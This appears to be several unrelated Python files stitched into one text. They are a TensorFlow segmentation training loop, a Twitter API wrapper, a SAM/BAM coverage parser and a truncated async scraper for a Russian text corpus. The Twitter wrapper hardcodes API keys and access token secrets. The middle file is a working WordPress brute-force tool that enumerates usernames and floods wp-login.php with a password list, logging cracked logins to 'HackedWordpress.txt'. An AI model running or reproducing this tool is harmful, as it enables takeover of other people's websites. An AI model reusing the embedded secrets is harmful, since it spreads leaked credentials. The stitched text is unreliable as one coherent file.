loss_d6=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,5],axis=3)-output))
loss = tf.reduce_min([loss_d1, loss_d2, loss_d3, loss_d4, loss_d5, loss_d6]) + 0.0025*(32*loss_d1+16*loss_d2+8*loss_d3+4*loss_d4+2*loss_d5+1*loss_d6)
# L1 Loss
loss2_d1=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,0],axis=3)-output))
loss2_d2=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,1],axis=3)-output))
loss2_d3=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,2],axis=3)-output))
loss2_d4=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,3],axis=3)-output))
loss2_d5=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,4],axis=3)-output))
loss2_d6=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,5],axis=3)-output))
loss2 = tf.reduce_min([loss2_d1, loss2_d2, loss2_d3, loss2_d4, loss2_d5, loss2_d6]) + 0.0025*(32*loss2_d1+16*loss2_d2+8*loss2_d3+4*loss2_d4+2*loss2_d5+1*loss2_d6)
# IoU Loss
nw1 = tf.expand_dims(network[:,:,:,0],axis=3)
nw2 = tf.expand_dims(network[:,:,:,1],axis=3)
nw3 = tf.expand_dims(network[:,:,:,2],axis=3)
nw4 = tf.expand_dims(network[:,:,:,3],axis=3)
nw5 = tf.expand_dims(network[:,:,:,4],axis=3)
nw6 = tf.expand_dims(network[:,:,:,5],axis=3)
iou_d1 = 1-tf.reduce_mean(tf.multiply(nw1,output))/(tf.reduce_mean(tf.maximum(nw1,output))+1e-6)
iou_d2 = 1-tf.reduce_mean(tf.multiply(nw2,output))/(tf.reduce_mean(tf.maximum(nw2,output))+1e-6)
iou_d3 = 1-tf.reduce_mean(tf.multiply(nw3,output))/(tf.reduce_mean(tf.maximum(nw3,output))+1e-6)
iou_d4 = 1-tf.reduce_mean(tf.multiply(nw4,output))/(tf.reduce_mean(tf.maximum(nw4,output))+1e-6)
iou_d5 = 1-tf.reduce_mean(tf.multiply(nw5,output))/(tf.reduce_mean(tf.maximum(nw5,output))+1e-6)
iou_d6 = 1-tf.reduce_mean(tf.multiply(nw6,output))/(tf.reduce_mean(tf.maximum(nw6,output))+1e-6)
loss_iou = tf.reduce_min([iou_d1, iou_d2, iou_d3, iou_d4, iou_d5, iou_d6]) + 0.0025*(32*iou_d1+16*iou_d2+8*iou_d3+4*iou_d4+2*iou_d5+1*iou_d6)
# add positive/negative clicks as soft constraints
ct_mask = tf.cast(input[:,:,:,3],dtype=tf.bool) & tf.cast(input[:,:,:,4],dtype=tf.bool)
ct_mask = tf.tile(tf.expand_dims(~ct_mask,axis=3), [1,1,1,6])
ct_mask = tf.cast(ct_mask, dtype=tf.float32)
ct_mask /= tf.reduce_mean(ct_mask)
output_tile = tf.tile(output,[1,1,1,6])
ct_loss = tf.reduce_mean(tf.abs(network - output_tile) * ct_mask)
all_loss = loss_iou + ct_loss
opt=tf.train.AdamOptimizer(learning_rate=0.0001).minimize(all_loss,var_list=[var for var in tf.trainable_variables() if var.name.startswith('g_')])
saver=tf.train.Saver(max_to_keep=1000)
sess.run(tf.initialize_all_variables())
ckpt=tf.train.get_checkpoint_state("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh")
if ckpt:
print('loaded '+ckpt.model_checkpoint_path)
saver.restore(sess,ckpt.model_checkpoint_path)
input_images=[None]*len(train_im_names)
output_masks=[None]*len(train_im_names)
# For displaying the losses
all=np.zeros(30000,dtype=float)
all2=np.zeros(30000,dtype=float)
all_iou=np.zeros(30000,dtype=float)
all_d1=np.zeros(30000,dtype=float)
all_d2=np.zeros(30000,dtype=float)
all_d3=np.zeros(30000,dtype=float)
all_d4=np.zeros(30000,dtype=float)
all_d5=np.zeros(30000,dtype=float)
all_d6=np.zeros(30000,dtype=float)
for epoch in range(1,101):
if os.path.isdir("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d"%epoch):
continue
cnt=0
for id in np.random.permutation(len(train_im_names)):
# for id in np.random.permutation(1):
if input_images[id] is None:
# The input image
input_images[id] = cv2.imread(im_path + "/" + train_im_names[id]+".jpg",-1)
if output_masks[id] is None:
# The SBD Groundtruth mask
mat_contents = sio.loadmat(seg_path + "/" + train_im_names[id] + ".mat")
tmpstr = mat_contents['GTinst']
tmpmat = tmpstr[0,0]
output_masks[id] = tmpmat['Segmentation']
output_mask = deepcopy(output_masks[id])
output_mask[output_mask==255] = 0
num_obj = output_mask.max()
for obj_id in range(num_obj):
st = time.time()
# random clicks
input_pos = cv2.imread("./train" + "/" + train_im_names[id] + "/ints/%03d_%03d_pos.png" % (obj_id + 1, np.random.randint(1, 16)),-1)
input_neg = cv2.imread("./train" + "/" + train_im_names[id] + "/ints/%03d_%03d_neg.png" % (obj_id + 1, np.random.randint(1, 16)),-1)
input_pos_clks = deepcopy(input_pos)
input_neg_clks = deepcopy(input_neg)
input_pos_clks[input_pos != 0] = 255
input_neg_clks[input_neg != 0] = 255
if np.sum(input_pos==0)==0:
continue
input_image=np.expand_dims(np.float32(np.concatenate(
[input_images[id], np.expand_dims(input_pos,axis=2), np.expand_dims(input_neg,axis=2),
np.expand_dims(input_pos_clks,axis=2), np.expand_dims(input_neg_clks,axis=2)], axis=2)),axis=0)
_,iH,iW,_=input_image.shape
output_image = deepcopy(output_mask)
output_image[output_mask != (obj_id+1)] = 0
output_image[output_mask == (obj_id+1)] = 255
output_image=np.expand_dims(np.expand_dims(np.float32(output_image),axis=0),axis=3)/255.0
_,current,current2,current3,d1,d2,d3,d4,d5,d6=sess.run([opt,loss,loss2,loss_iou, iou_d1, iou_d2, iou_d3, iou_d4, iou_d5, iou_d6],feed_dict={input:input_image,sz:[iH,iW],output:output_image})
all[cnt]=current*255.0*255.0 #squared in 255 range (remember the network takes [0,1]
all2[cnt]=current2*255.0 #changed to 255 in error
all_iou[cnt]=current3
all_d1[cnt]=d1
all_d2[cnt]=d2
all_d3[cnt]=d3
all_d4[cnt]=d4
all_d5[cnt]=d5
all_d6[cnt]=d6
cnt+=1
print("%d %d l2: %.4f l1: %.4f IoU: %.4f d1-6: %.4f %.4f %.4f %.4f %.4f %.4f time: %.4f %s"%(epoch,cnt,np.mean(all[np.where(all)]),np.mean(all2[np.where(all2)]),np.mean(all_iou[np.where(all_iou)]),np.mean(all_d1[np.where(all_d1)]),
np.mean(all_d2[np.where(all_d2)]),np.mean(all_d3[np.where(all_d3)]),np.mean(all_d4[np.where(all_d4)]), np.mean(all_d5[np.where(all_d5)]), np.mean(all_d6[np.where(all_d6)]),
time.time()-st,os.getcwd().split('/')[-2]))
os.makedirs("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d"%epoch)
target=open("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d/score.txt"%epoch,'w')
target.write("%f\n%f\n%f"%(np.mean(all[np.where(all)]),np.mean(all2[np.where(all2)]),np.mean(all_iou[np.where(all_iou)])))
target.close()
saver.save(sess,"result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/model.ckpt")
saver.save(sess,"result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d/model.ckpt"%epoch)
# validation
all_test = np.zeros(100, dtype=float)
all2_test = np.zeros(100, dtype=float)
all_iou_test = np.zeros(100, dtype=float)
target = open("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d/test_score.txt" % epoch, 'w')
for id in range(100):
input_image = cv2.imread(im_path + "/" + val_im_names[id] + ".jpg", -1)
input_pos = cv2.imread("./val" + "/" + val_im_names[id] + "/ints/%03d_%03d_pos.png" % (1, 1), -1)
input_neg = cv2.imread("./val" + "/" + val_im_names[id] + "/ints/%03d_%03d_neg.png" % (1, 1), -1)
input_pos_clks = deepcopy(input_pos)
input_neg_clks = deepcopy(input_neg)
input_pos_clks[input_pos != 0] = 255
input_neg_clks[input_neg != 0] = 255
output_gt = cv2.imread("./val" + "/" + val_im_names[id] + "/objs/%05d.png" % 1, -1)
output_gt = np.expand_dims(np.expand_dims(np.float32(output_gt), axis=0), axis=3) / 255.0
iH, iW, _ = input_image.shape
input_image = np.expand_dims(np.float32(np.concatenate(
[input_image, np.expand_dims(input_pos, axis=2), np.expand_dims(input_neg, axis=2),
np.expand_dims(input_pos_clks, axis=2), np.expand_dims(input_neg_clks, axis=2)], axis=2)), axis=0)
st=time.time()
output_image, loss_test, loss2_test, iou_test = sess.run([network, loss, loss2, loss_iou],feed_dict={input:input_image,sz:[iH,iW],output: output_gt})
all_test[id] = loss_test * 255.0 * 255.0
all2_test[id] = loss2_test * 255
all_iou_test[id] = iou_test
target.write("%f %f %f\n" % (all_test[id], all2_test[id], all_iou_test[id]))
print("%.3f"%(time.time()-st))
output_image = np.minimum(np.maximum(output_image, 0.0), 1.0)
for output_d in range(6):
save_image = input_image[0, :, :, 0:3] / 255.0
save_image[:, :, 0] = (save_image[:, :, 0] + 0.5 * output_image[0, :, :, output_d])
save_image[:, :, 1] = (save_image[:, :, 1] + 0.5 * output_image[0, :, :, output_d])
save_image[:, :, 2] = (save_image[:, :, 2] + 0.5 * output_image[0, :, :, output_d])
save_image = np.minimum(np.maximum(save_image, 0.0), 1.0) * 255.0
cv2.imwrite("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d/%s_%02d_BW.png" % (epoch, val_im_names[id], output_d),
np.uint8(output_image[0, :, :, output_d] * 255.0))
cv2.imwrite("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d/%s_%02d.jpg" % (epoch, val_im_names[id], output_d),
np.uint8(save_image))
target.write("Mean: %f %f %f\n" % (np.mean(all_test[np.where(all_test)]), np.mean(all2_test[np.where(all2_test)]), np.mean(all_iou_test[np.where(all_iou_test)])))
target.close()
|
nilq/baby-python
|
python
|
import tweepy
from tweepy.parsers import JSONParser
# This class creates an instance of the Twitter API
class API(object):
# Initiates the API
def __init__(self):
# Keys for Twitter API (maybe reading it from a .txt)
self.consumer_key = 'EfbgNEMgmXNSweNDcWmoaSwm0'
self.consumer_secret = 'u3HlNeQNhG4whVzbilCxvswfJTMLG4ppxisaqtB4exHvGgDxsc'
self.access_token_key = '3940337423-CC2NFNG4zX9t3Z4Hl5vAbseYmlhlz6CXbuDlQNr'
self.access_token_secret = 'tmK2f3ZPrOWSkqY2bzu9St0LqDzJVIp5IV8PWPwENh69z'
self.auth = tweepy.OAuthHandler(self.consumer_key, self.consumer_secret)
self.auth.set_access_token(self.access_token_key, self.access_token_secret)
self.api = tweepy.API(self.auth, parser = JSONParser())
# From a list of user_names, it returns the corresponding User entities
def get_users(self, user_names):
users = []
for user in user_names:
users.append(self.api.get_user(user))
return users
# Returns all the tweets in the timeline of a particular user
def read_tweets(self, user_id):
newest_id = 1 # The id of the newest tweet read (always greater than the oldest)
oldest_id = 0 # The id of the oldest tweet read (always lower than the oldest)
# While we are receiving new tweets
while newest_id -oldest_id > 0:
tweets = []
try:
# First option: This is the first time we read tweets
if oldest_id == 0:
tweets = self.api.user_timeline(id = user_id, count = 200) # Take 200 tweets
newest_id = tweets[0]['id'] # Update the newest id
oldest_id = tweets[len(tweets)-1]['id'] # Update the oldest id
# Second option: This is not the first time we read tweets
else:
new_tweets = self.api.user_timeline(id = user_id, count = 200,
max_id = oldest_id) # Take 200 tweets previous to the oldest tweet
tweets.extend(new_tweets) # Append the new tweets to the list
newest_id = new_tweets[0]['id'] # Update the newest id
oldest_id = new_tweets[len(new_tweets)-1]['id'] # Update the oldest id
except tweepy.error.RateLimitError:
limit = len(tweets)
msg = "Rate limit reached after reading %d tweets." % (limit)
raise tweepy.error.RateLimitError(msg)
return tweets
def rate_limit_status(self):
return self.api.rate_limit_status()['resources']['account']['/account/settings']['limit']
|
nilq/baby-python
|
python
|
# coding=utf-8
import threading, time, re, os, sys, json, random
try:
import requests
except ImportError:
print '---------------------------------------------------'
print '[*] pip install requests'
print ' [-] you need to install requests Module'
sys.exit()
'''
\ \ / /__ _ __ __| |_ __ _ __ ___ ___ ___
\ \ /\ / / _ \| '__/ _` | '_ \| '__/ _ \/ __/ __|
\ V V / (_) | | | (_| | |_) | | | __/\__ \__ \
\_/\_/ \___/|_| \__,_| .__/|_| \___||___/___/
|_|
Sunda Cyber Army github.com/bintangAlif5
Note! : We don't Accept any responsibility for any illegal usage.
'''
class mulai(object):
def __init__(self):
self.flag = 0
self.r = '\033[31m'
self.g = '\033[32m'
self.y = '\033[33m'
self.b = '\033[34m'
self.m = '\033[35m'
self.c = '\033[36m'
self.w = '\033[37m'
self.rr = '\033[39m'
self.cls()
self.print_logo()
site = raw_input(self.c + ' [' + self.y + '+' + self.c + '] ' + self.w + ' Target: ' + self.c)
if site.startswith('http://'):
site = site.replace('http://', '')
elif site.startswith('https://'):
site = site.replace('https://', '')
else:
pass
print self.c + ' [' + self.y + '+' + self.c + '] ' + self.w + ' START BruteForce Process: ' \
+ self.c + site
try:
agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
source = requests.get('http://' + site + '/wp-login.php', timeout=5, headers=agent).text.encode('utf-8')
print self.c + ' [' + self.y + '+' + self.c + ']' + self.w + \
' [Trying to Get Wp-login.php SourceCode] ' + self.g + ' [OK]'
time.sleep(0.5)
except:
print self.c + ' [' + self.y + '-' + self.c + ']' + self.w + \
' [ URL Not valid or Timeout! or Your Ip Address Blocked! ]'
sys.exit()
try:
WpSubmitValue = re.findall('class="button button-primary button-large" value="(.*)"', source)[0]
print self.c + ' [' + self.y + '+' + self.c + ']' + self.w + \
' [Trying to Get WpSubmit Value From SourceCode] ' + self.g + ' [OK]'
time.sleep(0.5)
except:
print self.c + ' [' + self.y + '-' + self.c + '] ' + self.w + \
' [Trying to Get WpSubmit Value From SourceCode] ' + self.r + ' [NO]'
sys.exit()
try:
WpRedirctTo = re.findall('name="redirect_to" value="(.*)"', source)[0]
print self.c + ' [' + self.y + '+' + self.c + ']' + self.w + \
' [Trying to Get WpRedirctTo Value From SourceCode] ' + self.g + ' [OK]'
time.sleep(0.5)
except:
print self.c + ' [' + self.y + '-' + self.c + ']' + self.w + \
' [Trying to Get WpRedirctTo Value From SourceCode] ' + self.r + ' [NO]'
sys.exit()
if 'Log In' in WpSubmitValue:
WpSubmitValue = 'Log+In'
else:
WpSubmitValue = WpSubmitValue
usgen = self.UserName_Enumeration(site)
if usgen != None:
Username = usgen
time.sleep(1)
print self.c + ' [' + self.y + '+' + self.c + ']' + self.w + \
' Enumeration Username: ' + self.g + str(Username) + self.g + ' [OK]'
else:
try:
Username = raw_input(self.c + ' [' + self.y + '*' + self.c + ']' + self.w +
' Username for Start bf: ')
if Username == '':
print self.c + ' [' + self.y + '-' + self.c + ']' + self.w + \
' [Username] ' + self.r + ' [NO]'
sys.exit()
except:
print self.c + ' [' + self.y + '-' + self.c + ']' + self.w + \
' [Username] ' + self.r + ' [NO]'
sys.exit()
try:
password = raw_input(self.c + ' [' + self.y + '*' + self.c + ']' + self.w + ' input Password list: ')
with open(password, 'r') as xx:
passfile = xx.read().splitlines()
print self.c + ' [' + self.y + '+' + self.c + '] ' + self.g + \
str(len(passfile)) + self.c + ' Passwords Loaded!'
time.sleep(2)
except:
print self.c + ' [' + self.y + '-' + self.c + ']' + self.w + \
' [Password list] ' + self.r + ' [NO]'
sys.exit()
thread = []
for passwd in passfile:
t = threading.Thread(target=self.BruteForce, args=(site, passwd, WpSubmitValue, WpRedirctTo, Username))
if self.flag == 1:
break
else:
t.start()
thread.append(t)
time.sleep(0.08)
for j in thread:
j.join()
if self.flag == 0:
print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' \
+ self.y + 'wordpress' + self.c + ' [Not Vuln]'
def cls(self):
linux = 'clear'
windows = 'cls'
os.system([linux, windows][os.name == 'nt'])
def print_logo(self):
clear = "\x1b[0m"
colors = [36, 32, 34, 35, 31, 37]
os.system("figlet wp-brute | lolcat")
x = """
r00t@star
Sunda Cyber Army github.com/bintangAlif5
Note! : We don't Accept any responsibility for any illegal usage.
example : http://site
"""
for N, line in enumerate(x.split("\n")):
sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
time.sleep(0.05)
def UserName_Enumeration(self, site):
_cun = 1
Flag = True
__Check2 = requests.get('http://' + site + '/?author=1', timeout=10)
try:
while Flag:
GG = requests.get('http://' + site + '/wp-json/wp/v2/users/' + str(_cun), timeout=5)
__InFo = json.loads(GG.text)
if 'id' not in __InFo:
Flag = False
else:
Usernamez = __InFo['slug']
return str(Usernamez).encode('utf-8')
break
except:
try:
if '/author/' not in __Check2.text:
return None
else:
find = re.findall('/author/(.*)/"', __Check2.text)
username = find[0]
if '/feed' in username:
find = re.findall('/author/(.*)/feed/"', __Check2.text)
username2 = find[0]
return username2.encode('utf-8')
else:
return username.encode('utf-8')
except requests.exceptions.ReadTimeout:
return None
def BruteForce(self, site, passwd, WpSubmitValue, WpRedirctTo, Username):
agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
post = {}
post['log'] = Username
post['pwd'] = passwd
post['wp-submit'] = WpSubmitValue
post['redirect_to'] = WpRedirctTo
post['testcookie'] = 1
url = "http://" + site + '/wp-login.php'
GoT = requests.post(url, data=post, headers=agent, timeout=10)
print self.c + ' [' + self.y + '+' + self.c + ']' + self.w + \
' Testing: ' + self.y + passwd
if 'wordpress_logged_in_' in str(GoT.cookies):
print self.c + ' [' + self.y + '+' + self.c + '] ' + \
self.y + site + ' ' + self.y + 'username: ' + self.g \
+ Username + self.y + ' Password: ' + self.g + passwd
with open('HackedWordpress.txt', 'a') as writer:
writer.write('http://' + site + '/wp-login.php' + '\n Username: admin' + '\n Password: ' +
passwd + '\n-----------------------------------------\n')
self.flag = 1
mulai()
|
nilq/baby-python
|
python
|
"""
methods for processing mapping results in SAM/BAM format
def parse_deltas(sam_file, ...):
parse a sam/bam file into dicts of coverage changes by position
def deltas_to_cov(cov_deltas, x_max=None, nan_for_zero=True):
convert coverage deltas into coverage array
class SAMFlag(IntFlag):
class for decomposing SAM flags into bits for easier understanding
"""
import numpy
import subprocess
import enum
from collections import defaultdict
from edl import blastm8
import logging
SAMTOOLS_CMD_TEMPLATE = """samtools view -F 2308 {sam_file}"""
def parse_deltas_from_sam(sam_file, samtools_cmd_template=SAMTOOLS_CMD_TEMPLATE, **kwargs):
"""
Parse a SAM file into a collection of coverage deltas by reference sequences
by default it uses samtools to strip all but the primary alignments first
then hits are parsed with any kwargs sent to blastm8.FilterParams()
"""
samtools_cmd = samtools_cmd_template.format(sam_file=sam_file)
with subprocess.Popen(samtools_cmd, shell=True, stdout=subprocess.PIPE,) as process:
string_lines = (l.decode() for l in iter(process.stdout))
return parse_deltas(string_lines, format=blastm8.SAM, **kwargs)
def parse_deltas(hit_table, portion=False, zero_indexed=False, **kwargs):
""" parses hit table into coverage deltas.
kwargs passed blastm8.generate_hits()"""
# dict of dicts of counts
deltas_by_ref = defaultdict(lambda: defaultdict(int))
read_count, hit_count = 0, 0
for read, hits in blastm8.generate_hits(
hit_table, **kwargs
):
read_count += 1
factor = 1 / len(hits) if portion else 1
for hit in hits:
hit_count += 1
start, end = sorted((hit.hstart, hit.hend))
if zero_indexed:
start, end = start+1, end+1
deltas = deltas_by_ref[hit.hit]
deltas[start] += factor
deltas[end + 1] -= factor
logging.debug(
"parsed deltas for %d contigs from %d reads and %d hits",
len(deltas_by_ref),
read_count,
hit_count,
)
return deltas_by_ref
def deltas_to_cov(cov_deltas, x_max=None, nan_for_zero=True):
""" converts dict of coverage deltas into array of coverage values
cov_deltas: {pos: cov_change, ...}
x_max: length of reference sequence (otherwise use last delta position)
zero: replace 0 coverage with NAN so plots are discontinuous
"""
zero = numpy.NAN if nan_for_zero else 0
sorted_keys = sorted(cov_deltas)
cov_segments = []
last_pos = 1
current_coverage = 0
for pos in sorted_keys:
delta = cov_deltas[pos]
cov_segments.append(
numpy.full(
pos - last_pos, current_coverage if current_coverage != 0 else zero
)
)
current_coverage += delta
last_pos = pos
cov_segments.append(
numpy.full(
1 if x_max is None else x_max + 1 - last_pos,
current_coverage if current_coverage != 0 else zero,
)
)
return numpy.concatenate(cov_segments)
class SAMFlag(enum.IntFlag):
"""
From Wikipedia SAM Format entry:
(int) (binary) (meaning)
1 000000000001 template having multiple templates in sequencing (read is paired)
2 000000000010 each segment properly aligned according to the aligner (read mapped in proper pair)
4 000000000100 segment unmapped (read1 unmapped)
8 000000001000 next segment in the template unmapped (read2 unmapped)
16 000000010000 SEQ being reverse complemented (read1 reverse complemented)
32 000000100000 SEQ of the next segment in the template being reverse complemented (read2 reverse complemented)
64 000001000000 the first segment in the template (is read1)
128 000010000000 the last segment in the template (is read2)
256 000100000000 not primary alignment
512 001000000000 alignment fails quality checks
1024 010000000000 PCR or optical duplicate
2048 100000000000 supplementary alignment (e.g. aligner specific, could be a portion of a split read or a tied region)
"""
PAIRED = 1
PROPER_PAIR = 2
UNMAPPED = 4
NEXT_UNMAPPED = 8
REV_COMP = 16
NEXT_REV_COMP = 32
READ_1 = 64
READ_2 = 128
NON_PRIMARY = 256
LOW_Q = 512
DUPLICATE = 1024
SUPPLEMENTAL = 2048
|
nilq/baby-python
|
python
|
"""
Module for requesting to URL and get page's html code from there,
download media files, check that the request if correct, page in RNC exists.
"""
__all__ = (
'get_htmls', 'is_request_correct', 'download_docs'
)
import asyncio
import logging
import time
from typing import List, Optional, Tuple, Union
import aiofiles
import aiohttp
import bs4
logger = logging.getLogger("rnc")
WAIT = 24
class BaseRequestError(Exception):
pass
class NoResultFound(BaseRequestError):
pass
class LastPageDoesntExist(BaseRequestError):
pass
class WrongHTTPRequest(BaseRequestError):
pass
async def fetch_html(url: str, # type: ignore
ses: aiohttp.ClientSession,
**kwargs) -> Optional[Union[Tuple[int, str], int]]:
""" Coro, obtaining page's HTML code.
This coro should be awaited from a worker.
:return: tuple of int and str, page index and its HTML code.
None if there's an error, -1 if it's 429 and the worker should
wait some time and make request again.
:exception: all exceptions should be processed here.
"""
worker_name = kwargs.pop('worker_name', '')
try:
resp = await ses.get(url, params=kwargs)
except Exception as e:
logger.error(
f"{e}\n{worker_name}Cannot get "
f"answer from '{url}' with {kwargs}")
return # type: ignore
if resp.status == 200:
text = await resp.text('utf-8')
resp.close()
return kwargs['p'], text
elif resp.status == 429:
resp.close()
return -1
logger.error(
f"{worker_name}{resp.status} -- '{resp.reason}' "
f"requesting to {resp.url}"
)
resp.close()
async def worker_fetching_html(worker_name: str,
q_args: asyncio.Queue,
q_results: asyncio.Queue) -> None:
"""
Worker requesting to URL with args from
q_args and putting results to q_results.
Wait some time and request again if there's 429 error.
"""
while True:
url, ses, kwargs = q_args.get_nowait()
logger.debug(
f"{worker_name}Requested to '{url}' with '{kwargs}'")
res = await fetch_html(url, ses, **kwargs, worker_name=worker_name)
if res is None:
q_args.task_done()
return
while res == -1:
logger.debug(
f"{worker_name}429 'Too many requests', "
f"page: {kwargs['p']}; wait {WAIT}s"
)
await asyncio.sleep(WAIT)
res = await fetch_html(url, ses, **kwargs, worker_name=worker_name)
logger.debug(
f"{worker_name}Received from '{url}' with '{kwargs}'")
q_args.task_done()
await q_results.put((res[0], res[1])) # type: ignore
async def get_htmls_coro(url: str,
start: int,
stop: int,
**kwargs) -> List[str]:
"""
Coro running 5 workers doing requests and
getting HTML codes of the pages.
URLs will be created for i in range(start, stop),
HTTP tag 'p' (page) is i.
"""
timeout = aiohttp.ClientTimeout(WAIT)
q_results = asyncio.Queue(maxsize=-1) # type: ignore
q_args = asyncio.Queue(maxsize=-1) # type: ignore
async with aiohttp.ClientSession(timeout=timeout) as ses:
for p_index in range(start, stop):
await q_args.put((url, ses, {**kwargs, 'p': p_index}))
tasks = []
for worker_index in range(5):
name = f"Worker-{worker_index + 1}: "
task = asyncio.create_task(
worker_fetching_html(name, q_args, q_results)
)
tasks += [task]
await q_args.join()
for task in tasks:
task.cancel()
results = [
q_results.get_nowait()
for _ in range(q_results.qsize())
]
results.sort(key=lambda res: res[0])
return [
html for _, html in results
]
def get_htmls(url: str,
start: int = 0,
stop: int = 1,
**kwargs) -> List[str]:
""" Run coro, get html codes of the pages."""
logger.info(f"Requested to '{url}' [{start};{stop}) with params {kwargs}")
coro_start = time.time()
html_codes = asyncio.run(
get_htmls_coro(url, start, stop, **kwargs)
)
logger.info("Request was successfully completed")
logger.info(f"Coro executing time: {round(time.time() - coro_start, 2)}")
return html_codes
async def get_htmls_async(url: str,
start: int = 0,
stop: int = 1,
**kwargs) -> List[str]:
""" Run coro, get html codes of the pages."""
logger.info(f"Requested to '{url}' [{start};{stop}) with params {kwargs}")
coro_start = time.time()
html_codes = await get_htmls_coro(url, start, stop, **kwargs)
logger.info("Request was successfully completed")
logger.info(f"Coro executing time: {round(time.time() - coro_start, 2)}")
return html_codes
def whether_result_found(url: str,
**kwargs) -> str:
"""
Whether the page contains results.
:return: first page HTML code if everything is OK.
:exception RuntimeError: if HTTP request was wrong.
:exception ValueError: if the result not found.
"""
logger.debug("Validating that the request is OK")
try:
page_html = get_htmls(url, **kwargs)[0]
except Exception:
logger.error(f"The request is not correct: {kwargs}")
raise RuntimeError
logger.debug("The request is correct")
logger.debug("Validating that the result exits")
soup = bs4.BeautifulSoup(page_html, 'lxml')
# TODO: сузить круг поиска
content = soup.find('div', {'class': 'content'}).text
res_msg = ('По этому запросу ничего не найдено.' in content or
'No results match the search query.' in content)
if res_msg:
raise ValueError
return page_html
def does_page_exist(url: str,
p_index: int,
first_page: str,
**kwargs) -> str:
"""
Whether a page at the index exists.
It means, the number of the page in 'pager' is equal to expected index.
RNC redirects to the first page if the page at the number doesn't exist.
Here it's assumed, that the request's correct.
:return: last page code if everything is OK.
:exception ValueError: the page doesn't exist.
"""
# indexing starts with 0
start = p_index
start = start * (start >= 0)
stop = p_index + 1
# request's correct → first page exists
if stop == 1:
return first_page
last_page = get_htmls(url, start, stop, **kwargs)[0]
soup = bs4.BeautifulSoup(last_page, 'lxml')
pager = soup.find('p', {'class': 'pager'})
if pager:
max_page_number = max(
int(page.text)
for page in pager.find_all('a')
if page.text.isdigit()
)
if not max_page_number:
raise ValueError
if max_page_number < stop:
raise ValueError
return last_page
# if there's no pager, but result exists.
# this might happen if expand=full or out=kwic
if last_page == first_page:
raise ValueError
return last_page
def is_request_correct(url: str,
p_count: int,
**kwargs) -> Tuple[str, str]:
"""
Check:
– is the HTTP request correct (means there are no exceptions catch).
– has there been any result.
– does a page at the number exist (
means RNC doesn't redirect to the first page).
:return: first and last pages if everything's OK.
:exception WrongHTTPRequest: HTTP request is wrong.
:exception NoResultFound: no result found.
:exception LastPageDoesntExist: the last page doesn't exist.
"""
logger.debug("Validating that everything is OK")
try:
# to reduce the number of requests
# the two checks are combined into one.
# coro writes logs by itself
first_page = whether_result_found(url, **kwargs)
except ValueError:
logger.error("HTTP request is OK, but no result found")
raise NoResultFound(f"{kwargs}")
except RuntimeError:
logger.error("HTTP request is wrong")
raise WrongHTTPRequest(f"{kwargs}")
logger.debug("HTTP request is correct, result found")
logger.debug("Validating that the last page exists")
try:
last_page = does_page_exist(url, p_count - 1, first_page, **kwargs)
except ValueError:
logger.error("Everything is OK, but last page doesn't exist")
raise LastPageDoesntExist(f"{kwargs}")
logger.debug("The last page exists")
logger.debug("Validated successfully")
return first_page, last_page
async def whether_result_found_async(url: str,
**kwargs) -> str:
"""
Whether the page contains results.
:return: first page HTML code if everything is OK.
:exception RuntimeError: if HTTP request was wrong.
:exception ValueError: if the result not found.
"""
logger.debug("Validating that the request is OK")
try:
page_html = (await get_htmls_async(url, **kwargs))[0]
except Exception:
logger.error(f"The request is not correct: {kwargs}")
raise RuntimeError
logger.debug("The request is correct")
logger.debug("Validating that the result exits")
soup = bs4.BeautifulSoup(page_html, 'lxml')
# TODO: сузить круг поиска
content = soup.find('div', {'class': 'content'}).text
res_msg = ('По этому запросу ничего не найдено.' in content or
'No results match the search query.' in content)
if res_msg:
raise ValueError
return page_html
async def does_page_exist_async(url: str,
p_index: int,
first_page: str,
**kwargs) -> str:
"""
Whether a page at the index exists.
It means, the number of the page in 'pager' is equal to expected index.
RNC redirects to the first page if the page at the number doesn't exist.
Here it's assumed, that the request's correct.
:return: last page code if everything is OK.
:exception ValueError: the page doesn't exist.
"""
# indexing starts with 0
start = p_index
start = start * (start >= 0)
stop = p_index + 1
# request's correct → first page exists
if stop == 1:
return first_page
last_page = (await get_htmls_async(url, start, stop, **kwargs))[0]
soup = bs4.BeautifulSoup(last_page, 'lxml')
pager = soup.find('p', {'class': 'pager'})
if pager:
max_page_number = max(
int(page.text)
for page in pager.find_all('a')
if page.text.isdigit()
)
if not max_page_number:
raise ValueError
if max_page_number < stop:
raise ValueError
return last_page
# if there's no pager, but result exists.
# this might happen if expand=full or out=kwic
if last_page == first_page:
raise ValueError
return last_page
async def is_request_correct_async(url: str,
p_count: int,
**kwargs) -> Tuple[str, str]:
"""
Check:
– is the HTTP request correct (means there are no exceptions catch).
– has there been any result.
– does a page at the number exist (
means RNC doesn't redirect to the first page).
:return: first and last pages if everything's OK.
:exception WrongHTTPRequest: HTTP request is wrong.
:exception NoResultFound: no result found.
:exception LastPageDoesntExist: the last page doesn't exist.
"""
logger.debug("Validating that everything is OK")
try:
# to reduce the number of requests
# the two checks are combined into one.
# coro writes logs by itself
first_page = await whether_result_found_async(url, **kwargs)
except ValueError:
logger.error("HTTP request is OK, but no result found")
raise NoResultFound(f"{kwargs}")
except RuntimeError:
logger.error("HTTP request is wrong")
raise WrongHTTPRequest(f"{kwargs}")
